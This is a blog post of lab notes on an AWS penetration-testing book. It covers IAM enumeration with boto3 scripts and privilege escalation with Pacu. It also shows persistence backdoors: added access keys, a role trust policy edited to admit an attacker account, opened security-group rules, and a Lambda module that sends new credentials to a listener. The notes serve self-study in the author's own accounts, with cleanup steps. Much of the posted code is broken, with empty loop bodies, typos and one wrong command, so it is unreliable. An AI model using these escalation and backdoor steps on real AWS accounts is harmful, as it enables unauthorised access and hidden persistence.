Posted in AWSPTwK, Blog

Hands-On AWS Penetration Testing with Kali Linux Section 4: AWS Identity Access Management Configuring and Securing

More notes…

Book info – Hands-On AWS Penetration Testing with Kali Linux

Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.

Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc. 

Ch 9 – Identity Access Management on AWS

IAM for AWS seems to function as you would expect IAM to function. Some good intro/reminder info is covered so even if you have little experience with IAM, you should have enough info to go on to work through this section.

IAM users are creds for something needing long-term access. IAM roles provide temporary creds to a user/service/app on an as needed basis. The default is a 1 hr lifespan before expiration. Using roles allows for more strict auditing and permissions management. Yay for roles – I can see a lot of benefits for using this type of access even if it might be a little more hassle.

Groups are groups – use to provide a common set of permissions. In AWS, a single user can be a member of up to 10 separate groups. A group can hold up to the total number of users allowed in the account. I can think of enterprise structures that might have difficulty with the 10 group limit. Hopefully with integration of AD or other services, this limitation would be manageable.

Creating IAM users, groups, roles, and associated privileges

There’s an IAM page in the AWS console, so that’s where you’ll go to work on IAM. When you go to IAM, it’s currently showing a “Security Status” checkup that covers the basics of AWS IAM security. Honestly, the IAM dashboard and environment should feel familiar if you’ve worked with IAM elsewhere. If not, this is a good way to get some practice since IAM is an included AWS feature and you only pay for the resources used.

For users, you can pick Programmatic access (access key ID and secret access key for AWS API access via AWS CLI or SDK) and/or AWS management Console access (password, autogenerate and custom options). Permissions can be set by IAM group, copy from another user, or attach an existing IAM policy (including a bunch of AWS created policies). Looking through the AWS policies, most look self-explanatory based on the title. Details can be found in the “Policies” tab of the IAM console. Groups are limited to 10 attached policies. Policies can be AWS managed (the predefined ones) or Customer managed ones. Modifying the AWS managed ones can be done easily enough by accessing the JSON and copying it to a new policy to be modified. The IAM console makes it easy to check the permissions and policies for the elements – really nice job by the AWS developers.

Roles cannot be added to groups but can have policies attached/removed. The trust relationship feature is what allows the roles to grant temporary permissions. Trust relationships are defined in the assume role policy JSON document. To see the policy, click on the “Trust relationships” tab from the Summary page and click “Show policy document”. Going into this more in ch 11 because roles are a common way of establishing persistence.

Policy structure..see the documentation. Key parts to know are Version, Statement, Sid (optional), Effect, Action, Resource (required sometimes), and Condition (optional). Understanding IAM policies is important because being able to read them and know what would be allowed is helpful for offense and defense. Wildcard characters (*) are allowed, so seeing one in a policy should either make you happy (red team) or paranoid (blue team).

Inline policies are created on a user, role, or group and cannot be reused. For security purposes, they should be avoided. For a pen testing situation, they can come in handy because they are stealthier than managed policies. The inline policies work like managed policies but have a different permission set. So when you’ve compromised a user, interaction may be allowed with one type but not the other.

Using IAM access keys

Install the AWS CLI if you haven’t already (check by using aws --version). Add creds by using aws --configure -profile <profileName> and following the prompts. Update credentials using the same command. Add credentials by creating additional profiles as needed. Since this was set up using --profile you have to include the appropriate profile with each command

The GetCalledIdentity call of the Security Token Service (STS) is available to all users and helps enumerate common account information – UserID, Account, and Arn (Amazon Resource Name).

aws sts get-caller-identity --profile <profileName>

You can list services available to this user and how to reference with aws a (which basically returns what could have been used instead of the invalid a argument). The same idea can be used to list APIs for each service. Nice little trick for enumeration. Help is available as is typical to get more information.

List instances in the default region with aws ec2 decribe-instances --profile <profileName>. Specify a region by adding --region <region>. You can change the output by using --output <outputFormat>.

Get information about the security groups with aws ec2 describe-security groups --group-ids <securityGroupID> --profile <profileName>. This will display the firewall rules.

Signing AWS API requests manually

AWS API calls typically require certain data be signed – the signatures are default for 5 min by default, leaving a brief window for replay attacks. AWS CLI and SDKs deal with signing automatically. But there are certain times when manually signing is required – if the programming language doesn’t have an AWS SDK or if full control of the request is needed.

Manual signing requires:

  1. Create a canonical request,
  2. Create a string to sign,
  3. Calculate the signature of the string, and
  4. Add the signature to the HTTP request.

Ch 10 – Privilege Escalation of AWS Accounts Using Stolen Keys, Boto3, and Pacu

Permission enumeration and (if possible) escalation is an important part of AWS (and pretty much any) pentesting. Enumerating permissions in a way that minimizes noise is important to avoid detection. Testing permissions by attempting to access resources leads to access denied errors, which gets noisy. Permission enumeration also can help get information about the environment. Knowing permissions is also important to help identify any known privilege escalation methods. You may have to make assumptions if unable to get a full list of permissions.

The book was super vague about script creation to import boto3 into python3. Not sure why a script was necessary, but ok. The boto3 documentation just uses import from within python.

Ah, after reading through, what is being done is the enumeration script is being built a section at a time. I did not find that clear even after reading through and going back to the start of building the script. But that’s what is going on. On one hand, I like the explanation of the script line by line. On the other, it would have been nice for that to have been clear from the beginning. Anyways…

Create the file for the script – (or whatever you want to call it) and enter the info with vim or nano (I’m using vim to force myself to practice with it, but good grief the default color scheme is terrible – changing it helps considerably):

#!/usr/bin/env/ python3
# Import needed libraries
import boto3
import json

# Set up creds
session = boto3.session.Session(profile_name='<profilename', region_name='<region>')
client = session.client('ec2')

# Create list to store enumerated instances
instances = []

# Make initial API call w MaxResults=1000 (max) to reduce number of calls
response = client.describe_instances(MaxResults=1000)

# Top level of results is "Reservations" so iterate through those
# Check if any instances are present
for reservation in response['Reservations']:
	if reservation.get('Instances'):
		# Merge into list

# Check response['NextToken'] for value to determine if have all results
while response.get('NextToken'):
	# Run API call again
	response = client.describe_instances(MaxResults=1000, NextToken=response-['NextToken'])
	# Iterate reservations and add to instances
	for reservation in response['Reservations']:
		if reservation.get('Instances'):

# Save to file in current directory
with open('./ec2-instances.json', 'w+') as f:
	# Use json library to dump
	json.dump(instances, f, indent=4, default=str)

Then make it executable – chmod +x ./ – and run the script to import boto3. In case you were wondering about the /usr/bin/env python3 versus /usr/bin/python3, this discussion on Stack Exchange shed some light on the why. The code should make sense – it’s all pretty straightforward. Coding in Python always makes me feel like it’s writing with bad grammar though.

Add S3 enumeration

Add S3 permissions if your IAM user doesn’t have them. Then add additional code to enumerate the S3 info. Create a client to target S3, list the buckets, add them to a list, and list out the files in a dictionary. Downloading the files is not recommended because it can raise alarms based on the cost incurred.

# Create S3 client, response, and variables
client = session.client('s3')
response = client.list_buckets()
bucket_names = []
bucket_objects = {}

# Iterate through response and pull bucket names
for bucket in response['Buckets']:

# Loop through buckets
for bucket in bucket_names:
	# First API call
	response = client.list_objects_v2(Bucket=bucket, MaxKeys=1000)
	# Check for objects returned
	if response.get('Contents'):
		bucket_objects[bucket] = response['Contents']
		bucket_objects[bucket] = []
	# Check if recevied all results, loop until have everything
	while response['IsTruncated']:
		response = client.list_objects_v2(Bucket=bucket, MaxKeys=1000, ContinuationToken=response['NextContinuationToken'])
for bucket in bucket_names:
	with open('./{}.txt'.format(bucket), 'w+') as f:
		for bucket_object in bucket_objects[bucket]:
			f.write('{} ({} bytes)\n'.format(bucket_object['Key'], bucket_object['Size']))

Dumping all account info

Info from accounts can be retrieved in multiple ways. So time to do IAM enumeration to pull info about the IAM service and AWS account. The API is paginated, so more lists are required. Create your file and then edit in vim:

touch ./
vim ./

Script details:

#!/usr/bin/env python3
# Account enumeration script

import boto3
import json

session = boto3.session.Session(profile_name='NAME', region_name='REGION')
client = session.client('iam')

# Declare variables to store enumerated info
user_details = []
group_details = []
role_details = []
policy_details = []

# Make first API call  
response = client.get_account_authorization_details()

# Store first set of data
if response.get('UserDetailList'):
if response.get('GroupDetailList'):
if response.get('RoleDetailList'):                                    
if response.get('Policies'):
# Check for more data
while response['IsTruncated']:
response = client.get_account_authorization_details(Marker=response['Marker'])      
	# Store data again
	if response.get('UserDetailList'):
	if response.get('GroupDetailList'):                                 
	if response.get('RoleDetailList'):    
	if response.get('Policies'):

# Open each file and dump info
with open('./users.json', 'w+') as f:
	json.dump(user_details, f, indent=4, default=str)
with open('./groups.json', 'w+') as f:
	json.dump(group_details, f, indent=4, default=str)
with open('./roles.json', 'w+') as f:
	json.dump(roles_details, f, indent=4, default=str)
with open('./policies.json', 'w+') as f:
	json.dump(policy_details, f, indent=4, default=str)

Running this, I got an error that an error occurred when calling the GetAccountAuthorizationDetails operation. I took that to mean that the account was lacking necessary IAM permissions. This happened because I didn’t set up my user quite the same way as the book. Made a quick group to allow IAM read only access and added my user, then the script ran with no problems.

I like to keep things organized, so I went back and added making a directory to store my results based off the answers in this Stack Overflow. If you add the directories, make sure to include them with the open statements so things get created in the right place.

# Add directories for results to the scripts as appropriate
# Remember to add the diretory to the path of the open statements
from pathlib import Path
Path("./directoryname").mkdir(parents=True, exist_ok=True)

For pentesting, I’d probably use a clean box for each client, so that level of organization should be clean enough. If I were going to be testing a large number, I’d look into a way to automate directory creation with a name for each target. I posted my full scripts with the file directory information on my GitHub.

Permission enumeration

This will extend the IAM script to determine exact permissions by correlating the info with data in the files. In a pentest scenario, the username might not be known, so the API can be used to get the information. Then info that might be attached to the user is checked. You’ll end up with policy documents for inline and managed policies attached to the user and groups the user is a member of. In the Kindle version, this gets a bit jumbled, so make sure you take the time to understand the structure of the code and indentation levels.

# Analyze policies related to user
username = client.get_user()['User']['UserName']
current_user = None
for user in user_details:
        if user['UserName'] == username:
                current_user = user
# Create empy list to store policies
my_policies = []

# Check for attached inline policies
if current_user.get('UserPolicyList'):  
	# Iterate through to pull documents
    for policy in current_user['UserPolicyList']:
    # Add policy to list                                                             

# Check for attached managed policies
if current_user.get('AttachedManagedPolicies'):
	# Iterate through list                                                           
    for managed_policy in user['AttachedManagedPolicies']:                           
    	# Note policy ARN for future reference                                       
        policy_arn = managed_policy['PolicyArn']                                     
        # Iterate through policies stored in policy_details to find policy         
        for policy_detail in policy_details:                                         
        	# Check if found                                                         
            if policy_detail['Arn'] == policy_arn:                                   
            	# Determine version to know what to grab                             
                default_version = policy_detail['DefaultVersionId']                   
                # Iterate version to find one needed                                 
                for version in policy_detail['PolicyVersionList']:                   
                	# Check for match                                                 
                    if version['VersionId'] == default_version:                       
                    	# Add policy to variable                                     
                        # Found so exit loop                                         
					# Found so exit loop                                             

# Check for groups
if current_user.get('GroupList'):                                                     
	# Iterate through groups                                                         
    for user_group in current_user['GroupList']:                                     
    	# Iterate through groups to find this one                                     
        for group in group_details:                                                   
        	if group['GroupName'] == user_group:                                     
            	# Check for inline policies                                           
                if group.get('GroupPolicyList'):                                     
                	# Iterate through inline policies                                 
                    for inline_policy in group['GroupPolicyList']:                   
                        # Check for managed policies                                 
                        if group.get('AttachedManagedPolicies'):                     
                        	for managed_policy in group['AttachedManagedPolicies']:   
                            	# Grab ARN                                           
                                policy_arn = managed_policy['PolicyArn']             
                                # Find policy in list                                 
                                for policy in policy_details:                         
                                	if policy['Arn'] == policy_arn:                   
                                    	default_version = policy['DefaultVersionId'] 
                                        	for version in policy['PolicyVersionList']:                                                         
                                            	if version['VersionId'] == default_version:

with open('./02-IAMenum/my-user-permissions.json', 'w+') as f:
	json.dump(my_policies, f, indent=4, default=str)

So now you have 2 scripts – 1 that enumerates EC2 and S3 information and 1 that enumerates IAM information.

An alternate method

As mentioned (and as found when I forgot to add the IAM permissions), the script won’t work if IAM – GetAccountAuthorization permissions aren’t present, but there are alternatives available. If the user has other IAM permissions, it might be possible. No script is provided but a guide is.


  1. Check for GetAccountAuthorizationDetails permission – if there, use script.
  2. Use iam:GetUser API to determine user
  3. Get policies for user
    1. iam:ListUserPolicies
    2. iam:GetUserPolicy
    3. iam:ListAttachedUserPolicies
    4. iamGetPolicy – determine default versions
    5. iam:GetPolicyVesion – get policy document
  4. Use iam:ListGroupsForUser to get groups
  5. Get policies for groups
    1. iam:ListGroupPolicies
    2. iam:GetGroupPoliciy
    3. iam:ListAttachedGroupPolicies
    4. iam:GetPolicy – determine default
    5. iam:GetPolicyVersion – get policy document

This requires a lot more API calls, is noisier, and thus more likely to get you caught. But it’s an option if you need it. Going to want to have the IAM API reference handy while working on this script. I’m going to keep working on this, but it’s going to take a lot of research. For me – for someone with more experience, I think it could be done fairly quickly.


Pacu, from Rhino Security Labs, is an open source AWS exploitation toolkit. Use Git to pull down via git clone. Installed and got an error message about s3transfer, but seems functional. Start a new session (these are like projects so you can keep engagements separate). Pacu has a cool feature where it will obscure certain distros to help prevent AWS’s security measure (GuardDuty) from keying on activity. Import previously loaded keys with import_keys <profilename>. Then whoami should return info about that awscli profile. Check available modules with ls. We’re going to check out the iam__enum_permissions module – note that the first _ is a double __. This will get info about the selected user. Run whoami again and note the difference. There should be a lot more information on the user now, including permissions, policies, etc.

Moving on to attempting privilege escalation. Conveniently, there is a module for that – iam__privesc_scan. Well, that was frighteningly quick and effective. This worked because of the PutUserPolicy that was added for this section (mental note – take that off when done). You can do run iam__enum_permissions and whoami to verify. You should see the policy name in the policies list and in the permissions section, a part with * and then * under “Resources” (this is easy to miss as you scroll through the output). You can also see the policy in the IAM console. Just for my sanity, I removed the new policy and the put user policy and tried to escalate again – this time it failed. Put the vuln back in place and run again to continue…

You can run the AWSCLI commands from within Pacu to make life easier. You can see if various logging and monitoring capabilities are enabled with run detection__enum_services. That’s a nice feature – figure out how much noise you might generate if people are watching. Some interesting modules to try aws__enum_account (enumerate info about current account), aws__enum_spend (see where money is being spent to identify services without having to poke a lot of things), ec2__download_userdata (download and decode EC2 user data – this one complained about needing enumeration done and ran through those with minimal input). EC2 user data may include sensitive info like API keys or passwords, so it’s a handy thing to check. If there is data, it will be downloaded to a folder where it can be reviewed. The book highlighted looking for #cloud-boothook with a script. The #cloud-boothook indicates code should run at every boot and can be used for persistence (more on this later apparently – sounds interesting).

Cool chapter, but a lot of material. I plan to keep working on the alternative IAM enumeration script, but it won’t be a priority for me. Hopefully someone else in the book club will have some ideas. With what I’ve done for it so far, I’m learning more about API usage and how Python processes things, so it’s good for me.

Ch 11 – Using Boto3 and Pacu to Maintain AWS Persistence

Persistence is good, and backup plans are a necessity in pentesting. Backup plans should ideally fly under the radar to set up and execute. AWS has some different options for persistence, but you also have more traditional options for persistence available when you target the instances deployed in an AWS environment. This chapter focuses on AWS aspects like user creds, role trust relationships, EC2 security groups, and Lambda functions.

Backdooring Users

For the user portion, the setup in chapter 10 will be used, with the PutUserPolicy and privilege escalation in place. AWS IAM users can have 2 key pairs. If the account you’ve gotten ahold of only has one setup, you could add a second to use for persistence. Effective, but fairly simple to detect and remove. Targeting a different user can be more effective.

Look for other users, find one that doesn’t have 2 keys set up (trying to create a third would be noisy), and create a key for the selected user. This approach can also work for privilege escalation if the first account you accessed has the iam:CreateAccessKey permission. So a big takeaway here is to carefully enumerate your initial creds for potential exploitation paths. If you haven’t built out some other users, you will need to do so. I started by creating an account with just S3 read permission and one with IAM read permissions.

# Check for other users
aws iam list-users --profile <profilename>
# Check existing keys
aws iam list-access-keys --user <targeteduser> --profile <profilename>
# Create access key
aws iam list-access-keys --user-name <targeteduser> --profile <profilename
# Store new keys using AWS CLI
aws configure --profile <targeteduser>
# Add keys to Pacu

Pacu also has a module for this – that’s convenient. And short.

run iam__backdoor_users_keys

The default gives a list to choose a user from, but you can also supply a username.

Backdooring Role Trust Relationships

IAM roles are important in AWS and can give specific permissions for a temporary amount of time (1 hr default). Roles can apply to a user, app, AWS service, another AWS account, or just about anything that can access AWS (but not a group).

IAM roles have a trust policy attached that specify who/what can assume the role and under what conditions. Seems straightforward. This is helpful for pentesters because the role trust policies (in some configurations) can be updated at will and they can give access to other AWS accounts. So update a trust policy for a privileged user to create a trust relationship and your attacker AWS account, and there’s your persistence.

You need to find a suitable target that will let you update the policy and attach to another account. Service-linked roles do not allow these – so avoid roles with AWSServiceRoleFor in the name, listing an AWS Service and Service-Linked role in the trusted entities column, or the path /aws-service-role/. Be cautious eliminating potential targets based solely on name – some may have service in the name but not truly be service-linked roles.

The books talks about a role named Admin. I didn’t remember enumerating roles, so I looked for a potential Pacu module and found iam__enum_users_roles_policies_groups that would enumerate roles. This pulled 3 roles that were saved in the database. Well, that’s nice. How to you find this data? Apparently by using the data command. You use the iam:GetRole and iam:ListRoles to get role info. I found this a little vague. Basically…

aws iam list-roles --profile <profileName>
aws iam get-role --role-name <roleName> --profile <profileName>

Since the Admin role wasn’t there, I presume I needed to create it. So into AWS Console > Roles > Create Role > pick the ARN you want to target > Pick the AdministratorAccess access > Name > Save. To do this exploit, you will need a separate AWS account to add to the role. Setting up a second account is a minor hassle, but handy, so I went ahead and did it. You will need to make sure the account has sufficient privileges to complete the exploit. It requires taking the AssumeRolePolicyDocument from the role, adding the arn for the second account, and then updating the role with the new trust policy using:

aws iam update-assume-role-policy --role-name Admin --policy-document <filepath> --profile <profileName>
aws iam get-role --role-name Admin --profile <profileName> #Verify

Be sure to take note of the role’s ARN for future reference. Then confirm by trying to assume the target role from the second (attacker account.

aws sts assume-role --role-arn <roleARN> --role-session-name PersistenceTest --profile <secondAccount>

You should get a response indicated success with a SecretAccessKey and a SessionToken. Fairly straightforward. Worked quite well once I got the second account and made sure the user had the correct privileges.

Automating with Pacu

There is a Pacu module to make the process more effective. This will also require a second account. If you leave off the --role-names variable, Pacu will give you a list to choose from.

# From within Pacu
run iam__backdoor_assume_role --role-names Admin --user-arns <secondAccountArn>

Backdooring EC2 security groups

As we’ve learned, EC2 Security Groups are functionally virtual firewalls. Adding a rule can provide a backdoor. Don’t get overexcited and add all the ports – that’s kind of a red flag. Choose a port or a few ports wisely.

See what’s available:

aws ec2 describe-instances --profile <profileName>

Sift through the mounds of info returned to find the instance ID, public IP, and Security Groups for the target instance. Then see what rules exist already:

aws ec2 describe-security-groups --group-ids <securityGroupID> --profile <profileName>

See what’s there and potentially try to play off of an existing rule (for instance opening the same ports for external access). The book example had internal ports frequently associated with MongoDB. The ec2:AuthorizeSecurityGroupIngress API is used to add a rule:

aws ec2 authorize-security-group-ingress -group-id <securityGroupID> --protocol <protocol> --port <port/range> --cidr <CIDRRange>

This returns nothing if successful and and error if not. If successful, test the connection to an EC2 instance in the Security Group. Running this gave me a message that I needed to specify a region, but specifying a region made it cranky too – asking for creds. It apparently wanted all the options:

aws ec2 authorize-security-group-ingress -group-id <securityGroupID> --protocol <protocol> --port <port/range> --cidr <CIRDRange> --region <region> --profile <profileName>

The automated version using Pacu is:

run ec2__backdoor_ec2_sec_groups --ip <CIDRRange> --port-range <port/range> --protocol <protocol> --groups <group@region>

The default is to backdoor all the groups in the current region, but you can specify a specific Security Group. Note that Pacu uses the Security Group name rather than the ID. Remember that even when backdooring, you don’t want to leave the backdoor open for the whole world, so don’t use for the CIDR range. And don’t forget to specify the ip, because the default is

Initial run gave me an error about the index being out of range. Looked at the error log, and I put in a single point and the parsing got angry because it was looking for the -. Switched it to a single port range (443-443), and it worked fine.

Also be sure to remove the policies and settings that allow the accounts to be compromised. I’m basically making the parts vulnerable when I’m actively doing the labs, then removing access when done. It gets a little repetitive, but I figure that’s also helping me internalize the different steps. Make sure you give things enough time to update and then check again to make sure nothing has remained open.

Using Lambda functions as persistent watchdogs

I haven’t used Lambda at all, so this should be interesting. Lambda allows you to run serverless code – sounds cool. It can be used to alert on activity in the account to either help us exploit it or tell us we might have been detected. There are other functions of course, but this will be the focus for this part. A good example is triggering when a new user is created. For a function to trigger, a CloudWatch Event rule is needed. This is dependent on CloudTrail logging enabled in us-east-1 because this is where IAM are delivered. This is because IAM is a global service. Usually CloudTrail logging will be turned on – best practice is enabling in all regions. If it’s not, you probably have additional options available to exploit.

When CloudTrail is not set up, there are still management event activity logs for the last 90 days which are stored and searchable for free. The book doesn’t really say anything about how to set this up to function for the lab. The Getting Started with AWS CloudTrail Tutorial seems like a logical place to start. I went through that and interestingly it showed as “Objects may be public”. Looking through the settings, I didn’t see anything allowing public access. I still enabled the “Block public access” option. We’ll see if I regret that decision working through the lab. It said it takes at least 15 minutes to populate, so I came back later to verify logs were being created. And since I’m constantly making account vulnerable and then fixing them, there were a lot of IAM logs.

This would take some time and effort, so why not just use Pacu? You will need to set up a server to receive creds. Setting one up in the Kali EC2 instance is probably easiest – AWS provides a public DNS, so should be workable. And since I have to double check my netcat syntax every time – SANS Netcat Cheatsheet. I hope I’m not the only one who often forgets the -v and then has to do a sanity check to make sure it started. Do make sure to open the port in whatever security group you are using.

The Pacu syntax is:

run lambda__backdoor_new_users --exfil-url

Ran this and got an error that it couldn’t find the zipped lambda function. Tried running Pacu as an elevated user just in case, and same error. Tried each of the roles available, same error. Tried going back and backdooring the Admin role, same error. I’m pretty sure from the error logs there’s an issue with the code, but I wanted to try what I could before calling it. I tried the lambda__backdoor_new_roles module to see what would happen, and I got the same error. There is also lambda__backdoor_new_sec_groups, but I’ve got to figure out the zip issue before chasing more rabbits.

I’m going to see what I can find, but wanted to go ahead and post these notes. There might be an update if/when I figure out the zip issue. I didn’t see it listed as an issue on the Pacu github, so it may be a permissions issue. The error is not specific enough to tell, and the error I got wasn’t the same as was listed in the code. The module was last updated 2 years ago, so I don’t think it’s an issue of pulling the wrong code.


This portion really didn’t have much cost associated with it. I have my EC2 instances available still, so there were the on-going costs of those. All in all, running about 10-15 dollars (US) per month. I could have dumped my EC2 instances other than the Kali one, but I’m keeping them for now in case I need them for future labs. Looking ahead, I think I will likely dump all but my Kali instance in the near future.

Note for authors, if you are designing labs that have a cost associated with them, please let your readers know when things are finished. Or really, just make it known regardless because it’s something helpful to share.

Summary of things to check/undo after exploiting all the things

Some of the places to check to button things back up after you have gone through the labs. I believe I’ve caught everything. The big one is the PutUserPolicy because it was initial piece that let to entry.

  1. PutUserPolicy permission attached to any user
  2. Admin policies added to any user via Pacu
  3. Security Credentials (Access keys) added to any user via Pacu
  4. Admin role (remove the ARN of second account, remove admin capabilities)
  5. Inbound rules on Kali (if used for listening server)


Lifelong paradox - cyber sec enthusiast - loves to learn

One thought on “Hands-On AWS Penetration Testing with Kali Linux Section 4: AWS Identity Access Management Configuring and Securing

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.